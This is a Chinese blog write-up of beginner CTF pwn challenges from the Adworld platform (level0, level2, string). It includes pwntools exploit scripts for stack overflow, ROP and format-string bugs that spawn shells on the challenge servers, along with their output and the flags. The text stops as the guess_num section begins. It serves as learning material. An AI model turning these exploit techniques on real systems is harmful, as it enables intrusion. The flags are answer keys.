{"id":343,"date":"2024-02-04T00:19:23","date_gmt":"2024-02-03T16:19:23","guid":{"rendered":"http:\/\/162.14.82.114\/?p=343"},"modified":"2024-02-04T00:19:23","modified_gmt":"2024-02-03T16:19:23","slug":"%e6%94%bb%e9%98%b2%e4%b8%96%e7%95%8c%e6%96%b0%e6%89%8b%e4%b8%93%e5%8c%ba-pwn","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/343\/02\/04\/2024\/","title":{"rendered":"\u653b\u9632\u4e16\u754c\u65b0\u624b\u4e13\u533a\u2014\u2014PWN"},"content":{"rendered":"<h1>\u653b\u9632\u4e16\u754c\u65b0\u624b\u4e13\u533a\u2014\u2014PWN<\/h1>\n<p>pwn \u5e38\u9700\u8981\u4f7f\u7528\u5230<code>IDA<\/code>\uff0c\u5bf9\u4e8e\u5b83\u7684\u5e38\u7528\u547d\u4ee4\u53ef\u4ee5\u53c2\u8003<a href=\"https:\/\/blog.csdn.net\/z786849296\/article\/details\/83211633?spm=1001.2014.3001.5502\">IDA\u57fa\u672c\u4f7f\u7528<\/a>\u8fd9\u7bc7\u6587\u7ae0\u3002<\/p>\n<h2>level0<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018225.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018225.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240204001639220\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>(\u8fd9\u4e2a\u56fe\u662f\u76d7\u7684\uff0c\u4e4b\u524d\u6211\u7684\u90a3\u4e2a\u56fe\u4e0d\u77e5\u9053\u5565\u65f6\u5019\u641e\u6ca1\u4e86\uff0c\u8fd9\u91cc\u5148\u501f\u7528\u4e00\u4e0b\u522b\u4eba\u7684\u56fe\uff0c\u653b\u9632\u4e16\u754c\u6539\u754c\u9762\u4e86\uff0c\u7eaa\u5ff5\u6211\u6b7b\u53bb\u7684\u9752\u6625\u8fa3\uff01)<\/p>\n<p>pwn\u771f\u662f\u76f2\u533a\uff0c\u770b\u7740wp\u91cc\u7167\u505a\u5427\uff0c\u5148\u4e0b\u8f7d\u9644\u4ef6\uff0c\u67e5\u770b\u7136\u540e\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n<pre><code>pwn@whoami:~\/\u684c\u9762$ checksec a\n[*] &#039;\/home\/p\/\u684c\u9762\/a&#039;\n    Arch:     amd64-64-little\n    RELRO:    No RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)\npwn@whoami:~\/\u684c\u9762$ .\/a\nHello, World<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u662f\u4e00\u4e2a64\u4f4d\u7684\u7a0b\u5e8f\uff0c\u62ff<code>IDA<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p>\u6309<code>F5<\/code>\u67e5\u770bC\u4f2a\u4ee3\u7801\uff0c\u770b\u5230<code>vulnerable_function()\u51fd\u6570<\/code>\u6709\u4e00\u4e2a\u5f88\u660e\u663e\u7684\u7f13\u5b58\u533a\u6ea2\u51fa\u6f0f\u6d1e\u3002<\/p>\n<pre><code class=\"language-c\">ssize_t vulnerable_function()\n{\n  char buf; \/\/ [rsp+0h] [rbp-80h]\n\n  return read(0, &amp;buf, 0x200uLL);\n}<\/code><\/pre>\n<p>\u7136\u540e\u7ee7\u7eed\u67e5\u770b\u53ef\u4ee5\u770b\u5230\u4e00\u4e9b\u5947\u5947\u602a\u602a\u7684\u4e1c\u897f\uff0c<code>callsystem\u51fd\u6570<\/code>\u91cc\u9762\u6709==\/bin\/sh==\uff1a<\/p>\n<pre><code class=\"language-c\">int callsystem()\n{\n  return system(&quot;\/bin\/sh&quot;);\n}<\/code><\/pre>\n<p>\u901a\u8fc7\u8986\u76d6\u8fd4\u56de\u5730\u5740\uff0c\u76f4\u63a5\u8c03\u7528 <code>callsystem(&quot;\/bin\/sh&quot;)<\/code> \u7684\u4ee3\u7801\uff0c\u5c31\u53ef\u4ee5\u5f97\u5230\u7cfb\u7edf\u7684 shell \u3002<\/p>\n<p>\u6784\u9020exploit\uff0c\u81ea\u5df1\u4e0d\u592a\u4f1a\u5199\uff0c\u76f4\u63a5\u501f\u9274<a href=\"https:\/\/www.cnblogs.com\/at0de\/p\/11269120.html\">\u5927\u4f6c\u7684<\/a>\u4e86\uff01<\/p>\n<pre><code class=\"language-lua\">from pwn import *\np = remote(&#039;111.200.241.244&#039;,55359)\np.send(&#039;a&#039;*0x88+p64(0x400596))\np.interactive() <\/code><\/pre>\n<p>\u4f46\u662f\u8fd9\u91cc\u51fa\u9519\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">pwn@whoami:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 55359: Done\nTraceback (most recent call last):\n  File &quot;exp.py&quot;, line 3, in &lt;module&gt;\n    p.send(&#039;a&#039;*0x88+p64(0x400596))\nTypeError: can only concatenate str (not &quot;bytes&quot;) to str\n[*] Closed connection to 111.200.241.244 port 55359<\/code><\/pre>\n<p>\u641c\u4e86\u4e00\u4e0b\u8fd9\u4e2a\u62a5\u9519\uff0c\u53d1\u73b0\u53ea\u8981\u5728<code>p64(0x400596)<\/code>\u540e\u9762\u52a0\u4e0a<code>.decode(&#039;unicode_escape&#039;)<\/code>\u5c31\u53ef\u4ee5\u4e86\u3002<\/p>\n<pre><code class=\"language-bash\">pwn@whoami:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 55359: Done\nexp.py:3: BytesWarning: Text is not bytes; assuming ISO-8859-1, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  p.send(&#039;a&#039;*0x88+p64(0x400596).decode(&#039;unicode_escape&#039;))\n[*] Switching to interactive mode\nHello, World\n$ ls\nbin\ndev\nflag\nlevel0\nlib\nlib32\nlib64\n$ cat flag\ncyberpeace{776f9e83fc7fd1774e8abed1e3d030e2}<\/code><\/pre>\n<h2>level2<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018227.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018227.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220211114511369\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u9898\u76ee\u4e0a\u9762\u5df2\u7ecf\u660e\u793a\u4e86\u4f7f\u7528 <a href=\"https:\/\/baijiahao.baidu.com\/s?id=1665277270769279870&amp;wfr=spider&amp;for=pc\">ROP<\/a>\uff0c\u5148\u641c\u4e00\u4e0b\u8fd9\u662f\u4e2a\u4ec0\u4e48\u4e1c\u897f\uff1a<\/p>\n<blockquote>\n<p><code>ROP\u7684\u5168\u79f0\u4e3aReturn-oriented  programming\uff08\u8fd4\u56de\u5bfc\u5411\u7f16\u7a0b\uff09\uff0c\u8fd9\u662f\u4e00\u79cd\u9ad8\u7ea7\u7684\u5185\u5b58\u653b\u51fb\u6280\u672f\u53ef\u4ee5\u7528\u6765\u7ed5\u8fc7\u73b0\u4ee3\u64cd\u4f5c\u7cfb\u7edf\u7684\u5404\u79cd\u901a\u7528\u9632\u5fa1\uff08\u6bd4\u5982\u5185\u5b58\u4e0d\u53ef\u6267\u884c\u548c\u4ee3\u7801\u7b7e\u540d\u7b49\uff09\u3002\u901a\u8fc7\u4e0a\u4e00\u7bc7\u6587\u7ae0\u6808\u6ea2\u51fa\u6f0f\u6d1e\u539f\u7406\u8be6\u89e3\u4e0e\u5229\u7528\uff0c\u6211\u4eec\u53ef\u4ee5\u53d1\u73b0\u6808\u6ea2\u51fa\u7684\u63a7\u5236\u70b9\u662fret\u5904\uff0c\u90a3\u4e48ROP\u7684\u6838\u5fc3\u601d\u60f3\u5c31\u662f\u5229\u7528\u4ee5ret\u7ed3\u5c3e\u7684\u6307\u4ee4\u5e8f\u5217\u628a\u6808\u4e2d\u7684\u5e94\u8be5\u8fd4\u56deEIP\u7684\u5730\u5740\u66f4\u6539\u6210\u6211\u4eec\u9700\u8981\u7684\u503c\uff0c\u4ece\u800c\u63a7\u5236\u7a0b\u5e8f\u7684\u6267\u884c\u6d41\u7a0b\u3002<\/code><\/p>\n<\/blockquote>\n<p>\u770b\u4e00\u4e0b\u7a0b\u5e8f\u7684\u4fdd\u62a4\u72b6\u6001\u548c\u5b83\u7684\u8fd0\u884c\u60c5\u51b5\uff1a<\/p>\n<pre><code class=\"language-bash\">pwn@ubuntu:~\/\u684c\u9762$ checksec 1\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/1&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)\npwn@ubuntu:~\/\u684c\u9762$ .\/1\nInput:\n111\nHello World!<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u5b58\u5728\u4e00\u4e2a\u8f93\u5165\u70b9\uff0c\u4e22\u5230 IDA \u91cc\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018229.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018229.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220211121005085\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u6253\u5f00main\u51fd\u6570\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018230.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018230.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220211125117940\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u8fdb\u5165<code>vulnerable_function()<\/code>\u548c<code>system()<\/code>\u518d\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">\/\/vulnerable_function()\nssize_t vulnerable_function()\n{\n  char buf; \/\/ [esp+0h] [ebp-88h]\n\n  system(&quot;echo Input:&quot;);\n  return read(0, &amp;buf, 0x100u);\n}<\/code><\/pre>\n<pre><code class=\"language-c\">\/\/system\nint system(const char *command)\n{\n  return system(command);\n}<\/code><\/pre>\n<p>\u518d<code>shift+F12<\/code>\u67e5\u770b\u5b57\u7b26\u4e32\u7a97\u53e3\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018231.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018231.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220211121759882\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u5c1d\u8bd5\u6784\u9020\u4e00\u4e2a<code>system(&quot;\/bin\/sh&quot;)<\/code>\uff0c\u8fd9\u91cc\u76f4\u63a5\u770b<a href=\"https:\/\/www.zhihu.com\/people\/shen-shang-27-14\">\u5e03\u533b<\/a>\u5927\u4f6c\u7684<a href=\"https:\/\/zhuanlan.zhihu.com\/p\/99052062\">\u811a\u672c<\/a>\u4e86\uff1a<\/p>\n<pre><code class=\"language-python\">from pwn import *\ncontext.log_level = &#039;debug&#039;\nr = remote(&quot;111.200.241.244&quot;,58123)\nbin_sh = 0x0804A024\nsystem = 0x08048320\nr.recvuntil(&quot;Input:\\n&quot;)\npayload = &#039;a&#039; * (0x88) + &#039;a&#039; * 4 + p32(system).decode(&#039;unicode_escape&#039;)+ p32(0).decode(&#039;unicode_escape&#039;) +p32(bin_sh).decode(&#039;unicode_escape&#039;)\nr.send(payload)\nr.interactive()<\/code><\/pre>\n<p>\u8fd0\u884c\u4ee5\u540e\u5c31\u5f97\u5230flag\u4e86\u3002<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 58123: Done\nexp.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  r.recvuntil(&quot;Input:\\n&quot;)\n[DEBUG] Received 0x7 bytes:\n    b&#039;Input:\\n&#039;\nexp.py:8: BytesWarning: Text is not bytes; assuming ISO-8859-1, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  r.send(payload)\n[DEBUG] Sent 0x98 bytes:\n    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  \u2502aaaa\u2502aaaa\u2502aaaa\u2502aaaa\u2502\n    *\n    00000080  61 61 61 61  61 61 61 61  61 61 61 61  20 83 04 08  \u2502aaaa\u2502aaaa\u2502aaaa\u2502 \u00b7\u00b7\u00b7\u2502\n    00000090  00 00 00 00  24 a0 04 08                            \u2502\u00b7\u00b7\u00b7\u00b7\u2502$\u00b7\u00b7\u00b7\u2502\n    00000098\n[*] Switching to interactive mode\n$ ls\n[DEBUG] Sent 0x3 bytes:\n    b&#039;ls\\n&#039;\n[DEBUG] Received 0x24 bytes:\n    b&#039;bin\\n&#039;\n    b&#039;dev\\n&#039;\n    b&#039;flag\\n&#039;\n    b&#039;level2\\n&#039;\n    b&#039;lib\\n&#039;\n    b&#039;lib32\\n&#039;\n    b&#039;lib64\\n&#039;\nbin\ndev\nflag\nlevel2\nlib\nlib32\nlib64\n$ cat flag\n[DEBUG] Sent 0x9 bytes:\n    b&#039;cat flag\\n&#039;\n[DEBUG] Received 0x2d bytes:\n    b&#039;cyberpeace{d4a511d80a7187395517501cde6fa398}\\n&#039;\ncyberpeace{d4a511d80a7187395517501cde6fa398}<\/code><\/pre>\n<h2>string<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018232.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018232.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220213180959759\" style=\"zoom:67%;\" \/><\/div><\/p>\n<p>\u5148\u67e5\u770b\u57fa\u7840\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec string\n[*] &#039;\/home\/pwn\/\u684c\u9762\/string&#039;\n    Arch:     amd64-64-little\n    RELRO:    Full RELRO\n    Stack:    Canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)<\/code><\/pre>\n<p>\u7a0b\u5e8f\u5f00\u4e86==NX(\u5806\u6808\u4e0d\u53ef\u6267\u884c)\u3001CANARY(\u6808\u4fdd\u62a4)\u548cPELRO==<\/p>\n<p>\u8fd0\u884c\u4e00\u4e0b\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ .\/string\nWelcome to Dragon Games!\n                                                 .~)&gt;&gt;\n                                               .~))))&gt;&gt;&gt;\n                                             .~))&gt;&gt;             ___\\\n                                           .~))&gt;&gt;)))&gt;&gt;      .-~))&gt;&gt;\\\n                                         .~)))))&gt;&gt;       .-~))&gt;&gt;)&gt;   \n                                       .~)))&gt;&gt;))))&gt;&gt;  .-~)&gt;&gt;)&gt;       \n                   )                 .~))&gt;&gt;))))&gt;&gt;  .-~)))))&gt;&gt;)&gt;\n                ( )@@*)             \/\/)&gt;))))))  .-~))))&gt;&gt;)&gt;\n              ).@(@@               \/\/))&gt;&gt;))) .-~))&gt;&gt;)))))&gt;&gt;)&gt;\n            (( @.@).              \/\/))))) .-~)&gt;&gt;)))))&gt;&gt;)&gt;\n          ))  )@@*.@@ )          \/\/)&gt;))) \/\/))))))&gt;&gt;))))&gt;&gt;)&gt;\n       ((  ((@@@.@@             |\/))))) \/\/)))))&gt;&gt;)))&gt;&gt;)&gt;\n      )) @@*. )@@ )   (\\_(\\  |))&gt;)) \/\/)))&gt;&gt;)))))))&gt;&gt;)&gt;\n    (( @@@(.@(@ .    _\/`-`  ~|b |&gt;))) \/\/)&gt;&gt;)))))))&gt;&gt;)&gt;\n     )* @@@ )@*     (@) (@)  |))) \/\/))))))&gt;&gt;))))&gt;&gt;\n   (( @. )@( @ .   _\/       \/ )) \/\/))&gt;&gt;)))))&gt;&gt;&gt;_._\n    )@@ (@@*)@@.  (6,   6) \/ ^ )\/\/))))))&gt;&gt;)))&gt;&gt;   ~~-.\n ( @jgs@@. @@@.*@_ ~^~^~, \/\\  ^ \/)&gt;&gt;))))&gt;&gt;      _.     `,\n  ((@@ @@@*.(@@ .   \\^^^\/&#039; (  ^  )))&gt;&gt;        .&#039;         `,\n   ((@@).*@@ )@ )    `-&#039;   ((   ^  ~)_          \/             `,\n     (@@. (@@ ).           (((   ^    `\\        |               `.\n       (*.@*              \/ ((((        \\        \\      .         `.\n                         \/   (((((  \\    \\    _.-~\\     Y,         ;\n                        \/   \/ (((((( \\    \\.-~   _.`&quot; _.-~`,       ;\n                       \/   \/   `(((((()    )    (((((~      `,     ;\n                     _\/  _\/      `&quot;&quot;&quot;\/   \/&#039;                  ;     ;\n                 _.-~_.-~           \/  \/&#039;                _.-~   _.&#039;\n               ((((~~              \/ \/&#039;              _.-~ __.--~\n                                  ((((          __.-~ _.-~\n                                              .&#039;   .~~\n                                              :    ,&#039;\n\nwe are wizard, we will give you hand, you can not defeat dragon by yourself ...\nwe will tell you two secret ...\nsecret[0] is de02a0\nsecret[1] is de02a4\ndo not tell anyone \nWhat should your character&#039;s name be:\naaaa\nCreating a new player.\n This is a famous but quite unusual inn. The air is fresh and the\nmarble-tiled ground is clean. Few rowdy guests can be seen, and the\nfurniture looks undamaged by brawls, which are very common in other pubs\nall around the world. The decoration looks extremely valuable and would fit\ninto a palace, but in this city it&#039;s quite ordinary. In the middle of the\nroom are velvet covered chairs and benches, which surround large oaken\ntables. A large sign is fixed to the northern wall behind a wooden bar. In\none corner you notice a fireplace.\nThere are two obvious exits: east, up.\nBut strange thing is ,no one there.\nSo, where you will go?east or up?:<\/code><\/pre>\n<p>\u8fd9\u91cc\u663e\u793a\u6743\u9650\u4e0d\u8db3\u7684\u8bdd\uff0c\u5c31\u4f7f\u7528<code>sudo chmod -R 777 [\u6587\u4ef6\u540d]<\/code>\u589e\u52a0\u6743\u9650\u3002<\/p>\n<p>\u6253\u5f00IDA\u770b\u4e00\u4e0b\uff0c<code>sub_400BB9<\/code>\u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u6709\u4e2a<code>\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018233.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018233.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220215194630987\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5728<code>sub_400CA6<\/code>\u91cc\u53ef\u4ee5\u627e\u5230\u5982\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018234.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018234.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220215225404977\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>==PS\uff1ammap\u662f\u4e00\u5757\u53ef\u6267\u884c\u533a\u57df\uff0c\u53ef\u4ee5\u901a\u8fc7\u5199\u5165shellcode\u7684\u65b9\u5f0f\u6765\u83b7\u53d6shell==<\/p>\n<p>\u53ef\u4ee5\u53d1\u73b0\u7a0b\u5e8f\u8fd0\u884c\u4e00\u5f00\u5934\u4e24\u4e2a<code>secret<\/code>\u662f<code>a1[0]<\/code>\u548c<code>a1[1]<\/code>\u7684\u5730\u5740\u3002<\/p>\n<p>\u7f16\u5199\u811a\u672c\u5373\u53ef\uff0c\u8fd9\u91cc\u4f7f\u7528\u4e86<a href=\"https:\/\/codeboy.blog.csdn.net\">\u611a\u516c\u642c\u4ee3\u7801<\/a>\u7684\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-python\">from pwn import *\np = remote(&quot;111.200.241.244&quot;, 63170)\np.recvuntil(&#039;secret[0] is &#039;)\n# \u83b7\u53d6\u7b2c\u56db\u4f4d\u7684\u5730\u5740\uff0c\u7528\u5207\u7247\u5207\u6389\u6700\u540e\u7684\\n\uff0c\u5f00\u59cb\u7684\u7a7a\u683c\u5728\u4e0a\u9762\u7684 recvuntil \u4e2d\n# \u83b7\u5f97\u7684\u6570\u5b57\u76f4\u63a5\u7528 int(x, 16) \u5373\u53ef\u8f6c\u6210\u5341\u8fdb\u5236\u6574\u578b\u50a8\u5b58\u5728 addr \u4e2d\naddr = int(p.recvuntil(&#039;\\n&#039;)[:-1], 16)\np.recvuntil(&#039;name be:\\n&#039;)\np.sendline(&#039;Yuren&#039;)\np.recvuntil(&#039;up?:\\n&#039;)\np.sendline(&#039;east&#039;)\np.recvuntil(&#039;leave(0)?:&#039;)\np.sendline(&#039;1&#039;)\np.recv()\np.sendline(str(addr))\np.recv()\np.sendline(&#039;%85x%7$n&#039;)\nrec = p.recvuntil(&#039;SPELL\\n&#039;)\ncontext(os=&#039;linux&#039;, arch=&#039;amd64&#039;)\np.sendline(asm(shellcraft.sh()))\np.interactive()<\/code><\/pre>\n<pre><code class=\"language-bash\">$ cat flag\ncyberpeace{e7fe529a83f5bb60339929857b2ea665}<\/code><\/pre>\n<p>\u672c\u9898\u5f3a\u70c8\u5efa\u8bae\u770b\u4e00\u4e0b<a href=\"https:\/\/blog.csdn.net\/Deeeelete\">Deeeelete<\/a>\u5e08\u5085\u7684\u6587\u7ae0\uff1a<a href=\"https:\/\/blog.csdn.net\/Deeeelete\/article\/details\/109707576?spm=1001.2101.3001.6661.1&amp;utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_aa&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_aa&amp;utm_relevant_index=1\">\u653b\u9632\u4e16\u754cPWN-string<\/a>\u4ee5\u53ca<a href=\"https:\/\/codeboy.blog.csdn.net\/?type=blog\">\u611a\u516c\u642c\u4ee3\u7801<\/a>\u7684\u6587\u7ae0<a href=\"https:\/\/codeboy.blog.csdn.net\/article\/details\/122553564?spm=1001.2101.3001.6650.1&amp;utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_paycolumn_v3&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_paycolumn_v3&amp;utm_relevant_index=2\">\u3010\u611a\u516c\u7cfb\u5217\u30112022\u5e7401\u6708 \u653b\u9632\u4e16\u754c-\u7b80\u5355\u9898-PWN-003(string)<\/a><\/p>\n<h2>guess_num<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018235.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 